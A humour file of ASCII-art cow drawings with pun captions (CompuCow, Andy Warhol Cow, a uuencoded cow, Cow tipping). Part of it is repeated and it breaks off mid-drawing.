- | |_ | |_
- /\ |____| |____|
- / O\ Santa Cows
- / , \
- / O \ _ - ~ ~ ~ ~ ~ ~ ~ ~ - _
- -/ , \- / |~ |~ \
- / O \ | |~ o| |~ o| |
- /, , \ / \ o| o| /
- / O O \ / \ /
- -/ , \- / / ~ ~ ~ ~ ~ ~ ~ ~ ~
- / O , \ / / .
- / , O ,\ (__) /* *\ / ./\.
- / O , O \ (oo) /\ /\ .//.\.
- / O \-\/ **** **** .///\\\.
- ------------------|| (oo) (oo) ////\\\\.
- ||/ ||----|| /-------\/ \/-------\ ||
- || ~~ ~~ /| || || |\ ~~
- Merry Cow-ristmas * ||----|| ||----|| *
- ~~ ~~ ~~ ~~
- Christmas Cowols
- O
- O O O
- O *
- Moory Cowristmas! ___ /|\
- _____________________| |_____ /||o\
- /______________________________\ /|o|||\
- ~ /________________________________\ /|||||o|\
- ~~ #### || | |||||||||||| | || /||o||||||\
- ~(oo) ||___|___||||||||||||___|___|| /||||o||||||\
- /-------\/ || | |||||||||||| | || /|o||||o|||o||\
- / | || ||___|___||||||||||||___|__ || | |
- * ||----|| ||||||||||||||||||||||||||||||oooooooooo| |ooooooo
- |----------------------| /\
- | | /\ /\/ \
- | | / \/ / \/\
- | | / \ \
- | | ----------------------------
- |______________________|
- \/
- |----------------------| o-@@
- |______________________|
- Minimalist Dead Cow
- ----------------------
- Mark Rothko Cow
- /=`=^^^#&@^@&)|||><<><><>
- \|}}{}{}{() (&) ~~~~#***
- (__) | (__) | (__) | (__) | (__) | (__) | #\**^^//?<>.+|@@@\/---___
- ( oo | ( oo | ( oo | ( oo | ( oo | ( oo | \|}}{}{/?<>.+|@@*&(*$@))(
- /\_| | /\_| | /\_| | /\_| | /\_| | /\_| | |@#)@(&*)($*I!?$>@$|$|$|$
- (__) | (__) | (__) | (__) | (__) | (__) | Jackson Pollock cow
- ( oo | ( oo | ( oo | ( oo | ( oo | ( oo |
- /\_| | /\_| | /\_| | /\_| | /\_| | /\_| | ____________________
------------------------------------------------- | (__) |
- (__) | (__) | (__) | (__) | (__) | (__) | | (oo) |
- ( oo | ( oo | ( oo | ( oo | ( oo | ( oo | | /-------\/ |
- /\_| | /\_| | /\_| | /\_| | /\_| | /\_| | | / | || |
------------------------------------------------- | * ||----|| |
- (__) | (__) | (__) | (__) | (__) | (__) | | ^^ ^^ |
- ( oo | ( oo | ( oo | ( oo | ( oo | ( oo | | Ceci N'est Pas |
- /\_| | /\_| | /\_| | /\_| | /\_| | /\_| | | Une Cow |
------------------------------------------------- --------------------
- Andy Warhol Cow Rene Margritte Cow
- oo --
- \/
- cow by night sleeping cow by night Chesire Cow
- II
- ( MOOOOOO ! ) II\
- ________\ / II + (__) ..oo( Hey, there's a cow driving that car! )
- |\ `v' \ + II (00)
- | \________|____\ \II\ \/-------\
- | ( ( @ @ ) ) II + || ||\ (__) ..oo ( How can he )
- |\|______\_O_/___| + II ||----|| * (oo) ( afford that? )
- | \_______________\ \II\ ~~ ~~ \/--------\
- \ (OO_##########_OO) II + || || \
- (\(_____[PHIL]_____) + II--+--+--+-II-+--+--+--II+--+--+--+II--+--+-
- (_) (_) \II II ~~ II ~~ II
- II--+--+--+-II-+--+--+--II+--+--+--+II--+--+-
- What cows think when people MOO at them
- /\\ ^ (__) (__)
- /__\\ | ( oo _ (oo)
- _ (o o) | /\__|( ) _ /-\/-\
- / \ /\_/\ / | \==//=(_) *POW!* / \
- | /|I I| | ==== | |
- ^/ |I I| | | | |
- | |I I| /| _ \ / \
- | |I I| / / / \ \ __________\
- | |_____| * || || \\
- ^ *^ ||_ ||_ (_)
-cow giving forgiveness Moo-hamid Ali Cow Bell.
- (!!) _/\_ \_\
- !!!!!!!!(oo) _______(oo) _________(oo)
- !/| \/ /| \/ /| Ferrari \/
- !/ |______|| / |______|| / |________||
- * || || * || || * || ||
- ^^ ^^ ^^ ^^ ^^ ^^
-Last of the Moo-hicans Mayflower cows Sports Cow
- (__) (__)
- (oo) (oo)
- /--------------- \/ / ------------- \/
- / ( !S M T W T F! ) / ( |7 8 9 +| )
- / ( +-+-+-+-+-+-+ ) * ( |4 5 6 -| )
- * ( +-+-+-+-+-+-+ ) ( |1 2 3 X| )
- ( +-+-+-+-+-+-+ ) ( |C 0 = /| )
- (+-+-+-+-+-+-+) ^---------^
- || || || ||
- || || || ||
- ^^ ^^ ^^ ^^
- /\
- / \ __ ________ ------
- DOCTOR _/__\_ |__| | |====|
- MOO/ /=(OO) (oo) * | v|
- \/ --/==-\/==\ /-------\/ |^^ *|
- / | \==|| \==\ /// / | || ------
- * ||-|==|| \==\/==/ * ||----||
- ~~ ///~~ \===/ ^^ ^^
- Gallifreyan Cow Straight out of Cowllege
- (__)
- (oo)
- /-------\/ # #
- / | || \\ //
-* ||----||\ \\ //
- ^^ ^^ \ \ --- /
- \ | |
- | | |
- | | |
- | / \_/ \ (__)
- | // \\ <--(xx)--#-
- | // \\ /\
- ___________\|/___________
- Cow-a-flower Cow at butcher's party
- ___--------___ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- / . . . \ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- |\/ . (__) . \/| ^^^^^^^^^^^^^^^^^^^oo^^^^^^^^^^^^
- || . . (oo) . . || ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- |/\ . \/ . /\| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- \___ . . ___/ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- --------- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- Cow in a haggis Cow on top of Ben Nevis
- ___________________________
- | (__) (__) (__) (__) | * (__)
- | ( oo ( oo ( oo ( oo | \ (oo)
-_______| /\_| /\_| /\_| /\_| |________ \-------\/
-| | | ||
-| _____ _____ | ||----||
-|___| |________________________| |____| (oo) (oo)
- |___| |___|
- Cow-pooling rollerscating cow
- __ o oo o
- (__) \||/
- (__) (__) (___)
- (__) (oo) (oo) (o o)
- ( ) /-------\/ /-------\/ /$$$$$$$\ /
- ( /* ) / | || / | || / $$$$$$$|O
- | | * ||----|| * ||----|| * ||w---||
- ^ ^ ^^ ^^ ^^ ^^ ^^ ^^
- Dairy-Air East Indian Cow Injun Cow Cash Cow
- ( )
- (___) PRISON# # # # # ||| |||
- (o o) # # # # #(_#) # (O O)
- /------------\ / # # # # #(o#) # /------------\___/
- / | #-# # #/-#--#--#-\# # / | |||
-* | ||| # # |# # #||# # / || |||
- ||--------||| # *# |#--#--#||# # * ||----------|||
- ^^ ^^ # # ^# # #^^# # ^^ ^^
- Orville Redencow The Bakker Cows
- (__) (__)
- / oo ______ / @@ ______
- | /\_| | \ | /\_| | \
- | |___ | | | |___ | |
- | ---@ |_______| | ---@ |_______|
- * | | ---- | | | | ---- | |
- \ | |_____ | |_____
- \|________| *____/|________|
- CompuCow CompuCow After an All-niter
- (__) (__)
- / -- ______ / .\/. ______
- | /\_| | \ | /\_| | \
- | |___ | | | |___ | |
- | ---@ |_______| | ---@ |_______|
- | | ---- | | * | | ---- | |
- | |_____ \ | |_____
- *____/|________| \|________|
- CompuCow Asleep at the Keyboard CompuCow Discovers Bug in Compiler
- \\ \\
- \\ \\
- / \ / \
- / \ / \
- \ \ \ \
- \ \(__) \ \(__)
- *--> (oo) *--> (oo)
- / / \/ o / / \/
- / / / /
- \ / o \ /
- \ / \ /
- // //
- // o //
- B-2 Stealth Bomber cow Stealth cow on bombing run
- ___
- / \ ( ) Happy
-| \ |--| Mooosic! (__)
-| | \ /__ (oo)
-+----------+ __oo| \ / -\/ (__)
-|Steinway &|_ \/| | / || >----(oo)---->
-|___ Sons ___|_/ |__| * ------|| /-------\/
-| | | / / | ^^ / | ||
-o o o | | ||---- * ||----||
- ^^ ^^ ^^
- Chopin'ing Cow TeX cow Steve Martin's cow
- (__) +=============================+
- (oo) | F R E D ' S S A L O O N |
- ______ ______\/ (__)| +-----+ |
- __|______\__/____/\\[} (xx)| | ___ | |(__)
- / --- \\ --- \/ | |/=|=\| |(oo)
-|[] / \ \ / / \ | |==|==| | \/
- | @ | \____/ | @ | | |==|==| |
- \ / \ / ------------------------------------
- --- ---
- COW-ASAKI Cows behind bars
- __ _________ __ _________
- ( V _ _ )_ ( V )_
- / ( \o/ ) ) / //// )
- ( \_O_/ \ ( (---) \
- \ /O\ ) \ |moo| )
- ( @ @ / ( (---) /
- (_____/\____) (_____/\____)
- o o
- o o
- o o
- (__) (__)
- /----(uu) /----(uu)
- *__/| \o==s *__/| \o==s
-/\(* \| __ \\----==s \)) /\(* \| __ \\----==s \))
- |/))* | \ )*\||/))// |/))* | \ )*\||/))//
- ~ ~\/--\*) ~ ~\/--\*)
- Dreaming Cow Cow Dreaming of Silage
- (__) o o * (__)
- (oo) o o \ (OO)
- /-------\/==o o \-------\/
- / | || ____ [] | ||
- * ||----|| |__| (/\)s==|----||
- ~~ ~~ /__\ ~ ~~
- Cow blowing bubbles. Cow kicking over lantern that started
- the Great Chicago Fire of 1885.
- __// \__ |\__|\
- /^^^)^^/ ) ( \^^(^^^\ | 00 |
- /( _( ^/ \^ )_ )\ \---<( -- )>---/
- | /\_| | \ | /\_| | \
- | |___ | | | |___ | |
- | ---@ |_______| | ---@ |_______|
- * | | ---- | | | | ---- | |
- \ | |_____ | |_____
- \|________| *____/|________|
- CompuCow CompuCow After an All-niter
- (__) (__)
- / -- ______ / .\/. ______
- | /\_| | \ | /\_| | \
- | |___ | | | |___ | |
- | ---@ |_______| | ---@ |_______|
- | | ---- | | * | | ---- | |
- | |_____ \ | |_____
- *____/|________| \|________|
- CompuCow Asleep at the Keyboard CompuCow Discovers Bug in Compiler
- \\ \\
- \\ \\
- / \ / \
- / \ / \
- \ \ \ \
- \ \(__) \ \(__)
- *--> (oo) *--> (oo)
- / / \/ o / / \/
- / / / /
- \ / o \ /
- \ / \ /
- // //
- // o //
- B-2 Stealth Bomber cow Stealth cow on bombing run
- ___
- / \ ( ) Happy
-| \ |--| Mooosic! (__)
-| | \ /__ (oo)
-+----------+ __oo| \ / -\/ (__)
-|Steinway &|_ \/| | / || >----(oo)---->
-|___ Sons ___|_/ |__| * ------|| /-------\/
-| | | / / | ^^ / | ||
-o o o | | ||---- * ||----||
- ^^ ^^ ^^
- Chopin'ing Cow TeX cow Steve Martin's cow
- (__) +=============================+
- (oo) | F R E D ' S S A L O O N |
- ______ ______\/ (__)| +-----+ |
- __|______\__/____/\\[} (xx)| | ___ | |(__)
- / --- \\ --- \/ | |/=|=\| |(oo)
-|[] / \ \ / / \ | |==|==| | \/
- | @ | \____/ | @ | | |==|==| |
- \ / \ / ------------------------------------
- --- ---
- COW-ASAKI Cows behind bars
- __ _________ __ _________
- ( V _ _ )_ ( V )_
- / ( \o/ ) ) / //// )
- ( \_O_/ \ ( (---) \
- \ /O\ ) \ |moo| )
- ( @ @ / ( (---) /
- (_____/\____) (_____/\____)
- o o
- o o
- o o
- (__) (__)
- /----(uu) /----(uu)
- *__/| \o==s *__/| \o==s
-/\(* \| __ \\----==s \)) /\(* \| __ \\----==s \))
- |/))* | \ )*\||/))// |/))* | \ )*\||/))//
- ~ ~\/--\*) ~ ~\/--\*)
- Dreaming Cow Cow Dreaming of Silage
- (__) o o * (__)
- (oo) o o \ (OO)
- /-------\/==o o \-------\/
- / | || ____ [] | ||
- * ||----|| |__| (/\)s==|----||
- ~~ ~~ /__\ ~ ~~
- Cow blowing bubbles. Cow kicking over lantern that started
- the Great Chicago Fire of 1885.
- __// \__ |\__|\
- /^^^)^^/ ) ( \^^(^^^\ | 00 |
- /( _( ^/ \^ )_ )\ \---<( -- )>---/
- / \ // | / \ | \ / \ \ |--| /
- / \ O/ \O // \ \__/ \--/
- ( )/\ //\( ) ( )
- /\ // \ /\ | |
- / / /W COW-TOW W\ \ \ --------
- * \( )/ * || ||
- \_ _// nn nn
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Cow after learning that
- the vice president has a
-(__) (__) (__) (__) lower IQ than he does
-(oo) + (oo) = (oo) (oo)
- \/ \/ \/ \/ (__,
- (+o)
-(__) (__)(__) (__) (__) (__) /-----#-----\'
-(oo) + (oo)(oo) = (oo) (oo) (oo) / | Cownucks|| \
- \/ \/ \/ \/ \/ \/ }}--------}} \ o
- == == --
- Cownting... This cow plays hockey
- /.
- moo /`'\ .
- (__) MOO! ` / ./ \..
- (oo) / ../ .' \.
- /-------\/ ../ / ../ \
- / | || ./ ./ ./ \
- * ||----|| ./ ./ \ \.
--------^^----^^----- .../ ../ ../ \
- \ / / /
- Ech-cow (echo)
- ________________ (__)
- ^__^ / \ (--)s ---mmmmoooooooOOOOOO!
- (oo) ( Milk is logical. ) __ \O//
- /-------\/ --'\________________/ / ==s)\_____
- / | || *--/|_/-----/ OO COW
-* ||W---|| |__ __ II JOYRIDES
- ^^ ^^ O O o o / \-----/ \
-Mr Spock's cow \__/ \__/
- * . . ,
- . . * . .
- . *
- \ / , (__) , ,
- - * - ( . |
- . / \ , . \/ . - - .
- . / \\ , |
- , * * / /\\
- . /\\ / . .
- * . / \\ . .
- _|_ , . , / , *
- | . , . * , . .
- . , . . . * .
- The Milky Way
- \ / ________________________________
- \/ / \
- (__) /\ | At times likes these you |
- (oo) O O | REALLY CoVet a proper surgeon! |
- _\/_ // O \________________________________/
- * ( ) // O
- \ (\\ // o
- \( \\ ) o (__)
- ( \\ ) /\ (oo)
- ___[\______/^^^^^^^\__/) o-)__ /\/\
- |\__[=======______//________)__\ Cocown (\==/)
- \|_______________//____________| \<>/
- ||| || //|| |||
- ||| || @.|| ||| (___) /^^^^^\
- || \/ .\/ || /- -\ / MU /
- . . ( ^ ) __/______/
- '.'.` \_O_/
- COW-OPERATION Buddha's Cow
- (_ ~ - _) / ~
- ( - - | =s
-O | *
- | O \ \ - |
- | \ |
- - - |
- Cow after one too many Pan-Galactic Gargle Blasters.
- (__) ---_
-(__) _______________* (oo) /| \
-(xx)-\ \ /-------\/ / |\ \_ (__)
- \/ /-\___________\--\ / | | * ||\ (oo)
- * ------ ~~ \____ \/
- Boneless Cow No leg cow (ground beef) Two leg cow (lean beef)
- (__)
- (oo)
- \/ \___/
- / / \\ (0 0)
- / /\\ \ /
- /\\ / v
- / / \\ |
- / <-------|------->
- / * |
- |\ |
- / | \ / __|__
- \\ \ \/ \/
- / \\ \ \/ \/
- / \\___\ \/ \/
- / \\ __|__
- / \\ \ /
- / / / \\ |\ /|
- / \\ | V |
- / / \\ | |
- / \\ | |
- / \\ W W
- \\
- ===============================O=========== Stick Cow sunbathing
- =========================================== at Malibu wearing a
- O) O) special cow bikini.
- The dreaded cowtapult
- (__) (___) ** ((__))
- (__) (__) (___) \\ ((oo))
- (oo) ( ) ( ) \\------\\//
- | \/ | ( /*) | | || ||
- | | || || | | |||----|||
- (___) ^^^ ^^^
-Cows doin' it Cows doin' it \_* Cow during an
- (( _ _ (___) (__)
- ( D\ (_)(_)____ (0 0) (oo)
- _______\__| | MOOTV____( /-------\_O---moo *-\/-------\
- /| || _/\____/ / | || / || | \
- / ||____| \/^ / \ * ||,---|| * ||-----|| *
-* || | O O ^^ ^^ \/|(/)(/\(,,/
- ^^ ^ Romie mooed... while Julie ate.
- "Moo-vie Camera" (The Bard's barnyard inspirations)
- ______________________________________________________
- | |
- _______ | |
- / _____ | | ACME MOO-VERS |
- / /(__) || | |
- ________/ / |OO| || | |
- | |-------|| | |
-(| | -.|| |_______________________ |
- | ____ \ ||_________||____________ | ____ ____ |
-/| / __ \ |______|| / __ \ / __ \ | | / __ \ / __ \ |\
-\|| / \ |_______________| / \ |_| / \ |__| |___________| / \ |__| / \ |_|/
- | () | | () | | () | | () | | () |
- \__/ \__/ \__/ \__/ \__/
- "The Moo-vers are here!"
- -- (__) * (__)* (__)* (__)* (__)
- *--- - (QQ) \ (oo) \ (oo) \ (oo) \ (o-)
- - \------\/ \-------\/ ^^\-------\/ ^^\-------\/ ^^\-------\/
---- | | | // | // | // | ||
- - ||()--|| ||------+ ||------+ ||------+ ||----||
- oo oo ^^ ^^ ^^ ^^ ^^
- Roller Cow Cows in polonaise
- -------------/
- /
- /
- /
- /
- /
- / (__)
-Ship arriving too late to save a drowing cow (apologies to Frank Zappa)
- \ / ____
- |\/| {___} \__/ \/ * \/
- (oo) ( * ) (--) | O O |
- /-------\/ V /--------\Q/ /--------\/ \ /
- / | ||__| / | || / | || \**/
-* ||----| * ||-----|| * ||----|| --
- ^^ ^ -- -- -- -- Milkael
-Cow from Vulcan Smoking 1-eyed cow Cow w/ rabbit ears Cowbachev
- (*) (*)
- (__) ^ ^ (__)
- (oo) | | | @(oo)@
- [..] | = | [..]@@
-\ | U (-) | | | | (-) U @@@@
- || ==<_\=====/_|______=_____|=|____________=__|____\====/_>== ||
- || ) |||||||||||||||||||||||||||||||||||||||||||||||||||| ( ||
- ||___)==||||||||||||||||||||||||||||||||||||||||||||||||||||==(___||
- |\====| |||||||||||||||||||||||||||||||||||||||||||||||||||| |====/|
- | \ | | | | / |
- = * = = = = * =
- cows having candlelight dinner
- (___)
- (o o)
- ( ** ) __\_/__
- |e e| //^^*^^\ \___/
- \ / ____*===*______* / * \ (O O)
- OO * Givenchy *\ / | * | \ \ /
- | * * * \ \ |=====| / O
- /**************** * "|_____|"
- // ************* | | | Cow exclaiming
- || || \_/|| | | | "Holy Cow"
- || || || || |_|_|
- v| v| v| v| ^ ^
- Haute Cowture COWNT
- |\
- |[] |\
- (__) | |[] |\
- (--) | (__) | |[] |\
- * _________\/ /| (o-) | (__) | |[]
- | (__) /,, ,, /_|_______\/ /| (oo) | (__) |
- | __(oo) *--------------/,, ,, /_|_______\/ /| (OO) |
- \===== |\/ | *--------------/,, ,, /_|_______\/ /|
- _|_/ \_ |===========| *--------------/,, ,, / |
- -//\-----/\\ o |===========| *----------------|
- \_/ \_/ o |===========| |
------------------ o |================|
- Cowazaki COW-WARD o o
- ______________________________
- / \
- ( Freisian a jolly good fellow! )
- \________________ ____________/
- ) ) ()
- (__) // ( )
- (__) (oo) / (___) ( __ )
- /(oo)---\/ (o o) (oo)
- /-------\/ || \ /-------\ /-------/||||
- / | ||----|| O|| | \ / | || |||
-* ||----|| ^^ ||---,|| * * ||----|| |
- ^^ ^^ ^^ ^^ ^^ ^^
- Two cows COW-ngratulating a bull Ayatollah Cow-manhi
- (__) |====|
- /--------------------/ (oo) \oo/
- / | || / (__) /-------\/ /-------\/
-* ||----|| /-----------(oo) / | ||----> / | ||
- ^^ ^^ \/ * ||----|| * ||----||
- ___/ ___/ ^^ ^^
- Network Virtual Cow Cowcatcher
-(with separate frontend and backend) Cow waterskiing (Major league)
- /\ __
- {__} _[__]_
- (oo) /(oo)\
- /-------\/ /------@\/@
- / | + || / | |@@
- * ||----|| * ||----||
- ^^ ^^ ^^ ^^
- Sacred Cow Zen Cow (eating grass) Hasidic Cow
- _____ _________________
- / \ / \
-( 1+2=3 ) ( 1+SIN(2x)+COS(3x) )
- \__ _/ \_____ __________/ (__)
- ( ( ) ) >(==)
- \\ // )__( /-\/-\
- \ (__) / (oo) /( )\
- (oo) \/-------* ^ ( ) ^
- /-------\/ || | \ ( )
- / | || ||----|| \ /----\
- * ||----|| vv vv / \ \
- ^^ ^^ ^ * ^
- COWculator (2) Reverse Polish Cow Cow-a-bunga
- ^^ ^^
- O (___) || * ||----||
- | (o o) || \ | ||
- (no-bull-ity) ---> % -\ /- || \-------/\
- |\/| O | || (oo)
- | | | || ( )
- / v-' || ><
- /==========| ( )
- // || (oo)
- ,------._(__) || || /-------\/
- * | \ ( oo || || / | ||
-vv====>----=\/====vv |===========| * ||----||
- ^^ ^^
- COWTOW Bi-cow molecule
- (__) (__)
- () () _____| oo | |oo|
- ()() / | /----|-|__|-|
- (oo) / | / | ||
- /-------UU /____________| * ||----||
- / | || ^^ ^^ ^^ ^^
-* ||w---|| Cow dressed up Cow dressed up
- ^^ ^^ as ghost as Frankenstein
-Eh, What's up Doc? for Halloween For Halloween
- (__) |\/| (__)
- (oo) (oo) >(==)
- __[_]__\/ /-------VV /-------\/
- / | || / | || / | ||
-* ||----|| --> . * ||----|| * ||----||
- ^^ ^^ ^^ ^^ ~~ ~~
- Portable Cow Japanese model Lycownthropy Cow-a-bunga (2)
- (very handy) portable COW
- _______________________
- |^^^^| ( Dammit, Jim, I'm a )
- | | ( doctor, not a butcher!)
- @| Oo (---------------------))
- (MM) | ._> (__) )
- (oo) \ / (oo)
- /-------\/ /--------- /-------\/
- / | || / | || / I * II
- * ||----|| * ||-----|| * II----II
- ^^ ^^ ^^ ^^
- Cowabunga! Bart Simpcow Dr. Bones McCow
- ________________ (__)
- // (__)(__)||(__)\\ (oo)
- // (oo)(oo)||(oo) \\ /-------\/
- // \\"\/""\/"||"\/"/ \\ / //____\\
- / ============||=======\\ * // \\
- (| |- ||- ||)
- |________|_____||________||/ ***********
- \-( O )----------( O )--/ **** ***
- --- --- *** *
- ****o
- Cowpool ******
- ***
- *** *
- (__) *** ***
- (oo) ******
- /-------\/___()~
- / | || Cow jumping over the moon
- * ||----||
- ^^ ^^
- Cow smoking a pipe
- o o o o o o o
- o o o o o o o o
- (__) o o o o o o
- (oo) o o o o o o
- /-------\/___() o o o o
- / | ||
- * ||----||
- ^^ ^^
- Cow blowing bubbles from a pipe
- * * * o @ ~ *
- * * * , o * * *
- (__) * * * . * o
- (oo) * * ) . *
- /-------\/ * -(*)- ~ @ *
- / | || (
- * ||----||
- ^^ ^^
- Cow star-gazing
- |
- \|/
- ----*----
- /|\
- |
- (__)
- (oo)
- /-------\/
- / | ||
- * ||----||
- ^^ ^^
- Cow wishing upon a star
- ________ _______
- (__) / \ (__) / \
- (oo) ( Squeak!! ) (oo) ( !oMo! )
- /-------\/ --'\________/ /-------\/ --'\_______/
- / | || / | ||
- * ||----|| * ||----||
- ~~ ~~ ~~ ~~
- A Cow-mon Dyslexic
- Mistake Cow @@@@@
- @@\0 0/@@
- (o o)
- ___________________________ ** |U| **
- / / / / ***( )***
- / /__________/ / // \ / \\
- / / // *** \\
- / / *******
- / / ***********
- / / ***************
- / 3.5" 135tpi / *******************
- /__________________________/ *********************
- *********************
- Cow Stored as Binary
- Information. Cow Belle
- (___) (___) (___)(___)
- (o o) * (o o) (o o)(o o)
- /------\ / (__) \_(--) /------\ / \ /-----\
- / ____O (oo) / (**)\ / (__)_O O___ \
- ( )/----\----\/ ( / \/\ ) ( )(oo)--\---/--/( )
- /\oo===| / ~ || \\ / /\oo==@/|| ~ \~ |===oo/\
- | || ||~-----|| |||~~|| | || ||-----~|| || |
- * || || || ||| || * || || || || *
- ~~ ~~ ~~ ~~~ ~~ ~~ ~~ ~~ ~~
- Cows at a garden party
- * (__) .
- \ (oo) .'
- ...\------\/ '.
- (__) (__) . (__) || (__)
- (oo) (oo) . (oo)----|| (oo)
- /-------\/ /------\ / /-------\/ ^^/-------\/
- / | || / | |\/ / | || \| ||
- * ||----|| * ||----|| * ||----|| *><----><
- ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^^
- Cow Cow feeling Cow feeling Cow feeling
- pissed off pissed on pissed
- (__) * (__) * (__) ( )
- (oo) \ (oo) \ (OO) ( )
- /-------\/ ..\-------\/ \-------\/ ( ( )
- / | || . | || / \\ ( ) )
- * ||W---|| . ||----|| //------\\ ( )
- ^^ ^^ ^^ ^^ ^^ ^^
- Cow about to Cow giving Cow who's just Cloud of dust where
- give milk U.H.T. milk seen a McDonalds same cow was before
- (__) (__) s * )__(
- (oo) (@@) s / (oo)
- /-------\/ /-------\=== (__) \--___--\/
- / | || / | || /------(xx) | |
- * ||----|| * ||----|| * \ /\/ /\----/ \
- WWWWWWWWWWWWW ^^ ^^ ===----==== ^ ^ ^ ^
- Cow standing in Cow SMOKING Dead cow Mad Cow
- long grass grass
- (__) (__) (___) * (___)
- (00) (oo) (@ @) \ (* *)
- /-------\/ /-------\/ /-------\ / \-------\ /
- / | || / | || / | |O | |O
- * ||----|| * ||O---|| * ||O---|| ||@>--||
- ^^ ^^ [__]. ^^ [__]. ^^ ^^ ^^
- Norwegian cow Calf having Calf making Same bull after
- drink mistake calf went away
- (__) * (__) (__) (__)
- (DD) \ (xx) (oo) (oo)
- /-------\/ \-------\/ /-',',', \/ /-------\/
- / | || | || ./,|',',',',' / | (+) ||
- * ||----|| ||----|| |''''''| * ||----||
- ^^ ^^ ^^ ^^ ~~ ~~ ^^ ^^
- Cow watching Cow having a Jersey Cow The "bummer of
- above bull sexual fantasy a birthmark" Cow
- (with due accowlades
- to Gary Larson
- -\ /- (The Far Side))
- '\/'
- (oo) _________
- /------- \/ | \ /|
- ./ | , | - -X- - |
- |------| |/______\_|
- --|------|---------|-------
- /---------------------------\
- / __ \\
- // / \ __ \\\
- /// / \ \\\\
- Highland Cow
- ________ \
- |########| \
- |########| \
- --------\ \
- (__) | \
- (oo) | \ ______________________
- \/ | | |
- /+++\ o | |
- /+++++\ | ____ |
- ~ #/##\#~ \ | / To | |
- / ii \ \ | \ W.C.| |
- ~~ ~~ \ | ---- |
- \ | |
- \ | |
- In"cow"tinent \|------------------------
- (__) (oo) /-------\/ / | || * ||----|| ^^ ^^
- A well adjust(1)ed Cow
- (__)
- (oo)
- ^^ ^^
- /-------\/
- / | ||
- * ||----||
- An ass-sort(1)-ed Cow
- >ysP -"JlAe B x
- A compress(1)ed Cow
- awk: Usage: awk [-f source | 'cmds'] [files]
- An awk(1)ward Cow
- begin 644 cow
- M"B @(" @(" @("A?7RD*"2 H;V\I"B @+RTM+2TM+2U<+PH@+R!\(" @("!\
- ;? HJ("!\?"TM+2U\? H@("!>7B @("!>7@H*
- end
- uuencoded cow
- __
- _|__|_
- (oo)
- /-------\/
- / |===w=||_|OO ... .... (bullets,where w=gun)
- * ||----|
- ^^ ^
- this is the cowboy-cow, in case u are wondering 'where
- the hell is the horse then ?', let me
- inform u that it too needs recreation and
- has gone to play man-shoes !!
- ___________________________
- | | (__) \
- | | (oo) |
- | | /-------\/ \____ Cow'ndom
- | | / | || ____) Use it to prevent AIDS
- | | * ||----|| /
- | | ~~ ~~ |
- | |___________________________/
- /-----------------------------------------------------------------------
- |[] ________ ________ ------ ________ ________ ________ ------ __
- / | (oo) | | (oo)| |[][]| |(oo) | |oo)(oo| |(oo) | |[][]| |
- | | _\/__| |___\/_| |[][]| |_\/___| |\/__\/| |_\/___| |[][]| |_
- |--------------------------| |--------------------------------| |----
- | | | | |
- +---/OOO==OOO\-------------======---------/OOO==OOO\-------------======----
- Cow-st liner
- _-_
- (__) [ ]
- (oo) /-_-
- \/-------/
- || |
- ||----||
- ~~ ~~
- (__) *
- (oo)
- /-------\/ ~~____________________________________________
- / | // ||\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/||
- * ||------+ ||/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\||
- ~~ ||\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/||
- _-_
- [ ] (__)
- -_-\ ( )
- \--------
- | ||
- ||----||
- ~~ ~~
- Andrei Ag-cow-si
- (__)___________________________________________________________(__)
- (oo) (oo)
- \/_____________________________________________________________\/
- Cowaxial Cable
- (__) (__)
- ( V V ) (oo)
- (>O O<) /-------\/
- ( A A ) / | ||
- /-------\/ * ||----||
- / | || | \ | \
- * ||----|| V> V> V> V>
- ^^ ^^
- Tammy Fae Baker's cow Imelda Marcos' cow
- ++ ++
- +||---||+
- (__) | 1 2 3 | (__)
- (oo)O | 4 5 6 | (oo)
- /-------\/o/ | 7 8 9 | /-------\/__
- / | |__/~~~~~~| * 0 # | / | |__\/ \~~~~~~~/
- * ||----| +-------+ * ||----| \_____/
- ^^ ^ ^^ ^
- Cattle call Cow punch
- (__) / _
- (oo) / / \
- -\/-/ | + |
- /\__/_| (___) |___|
- / / (o o) (o o)
- | / /_______\ / /-------\ /
- \ _ / / |-,---||O / | ||O
- | | * || || * ||,---||
- ^ ^ ^^ ^^ ^^ ^^
- Cow Ripken Bullemic Papal Bull
- ___ ___
- \ \ \ \
- (___) ___\__\__\__\__
- (o o) | O O O O O O|
- --\ /----+-------------+-------/
- | O /
- \ /
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Steerage
- ___________________
- ___ ( I MOO-ON MY WAY )
- _|___|_ //~~~~~~~~~~~~~~~~~~
- v v ( uu| '
- / (___) \ /\_c|
- | (o o) | / \ C#=}~|
- \_\ /_/ | ) \ (___) _____
- | O | | | o | (- -) / zzz |
- | | \ | | | /-------\ / ---<______/
- /~~~\ [_] o ] / | ||O
- / \ | / \| * ||,---||
- ~~|~~|~ L_/ | ^^ ^^
- | | || || Bulldozer
- \ \ || ||
- Le Bullet Russe
- Dick Tracy's Cow
- | ==================================
- | = =
- | = _____ =
- | = ______ / \ =
- | = / \ | \ =
- | = / ||\ (__) =
- |## (__) m m = (__) __ || \ (oo) =
- | ## (oo) / / = (oo) / \||(__) \/ =
- | ## |\/ / / = \/ (__) ||(oo) =
- | ## | / / m m = (oo) || \/ =
- | ## \ \ / / = \/ || =
- | ## \ / / = || =
- | ## \ / / = || =
- | ## \-- = || =
- | ## | = || =
- | ## --* = || =
- |____________##_______________ = || =
- ## = || =
- ## = =
- ## = cow-cow nut =
- ## = =
- ## = =
- ## ==================================
- ##
- ##
- ##
- ##
- Cow-sine wave
- Cow tipping:
- Step 1. Step 2.
- (__)
- (--)
- /-------\/ O--------O_
- / | || /| :: |_)
- * ||w---|| * O--------O
- ~~ ~~
- *
- (__) ________ * *
